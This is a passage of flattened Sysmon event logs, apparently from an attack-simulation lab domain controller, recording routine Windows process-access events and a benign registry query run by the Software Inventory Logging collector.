|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16DE-5F84-8900-000000007F01}4844C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.714{5D479F2C-16DE-5F84-8800-000000007F01}47164736C:\Windows\system32\cmd.exe{5D479F2C-16DE-5F84-8900-000000007F01}4844C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.713{5D479F2C-16DE-5F84-8900-000000007F01}4844C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{5D479F2C-16DE-5F84-8800-000000007F01}4716C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16DE-5F84-8700-000000007F01}46244464C:\Windows\system32\conhost.exe{5D479F2C-16DE-5F84-8800-000000007F01}4716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16DE-5F84-8800-000000007F01}4716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.698{5D479F2C-16DE-5F84-8600-000000007F01}46164628C:\Windows\system32\cmd.exe{5D479F2C-16DE-5F84-8800-000000007F01}4716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.707{5D479F2C-16DE-5F84-8800-000000007F01}4716C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16DE-5F84-8600-000000007F01}4616C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16DE-5F84-8700-000000007F01}46244464C:\Windows\system32\conhost.exe{5D479F2C-16DE-5F84-8600-000000007F01}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16DE-5F84-8700-000000007F01}4624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\W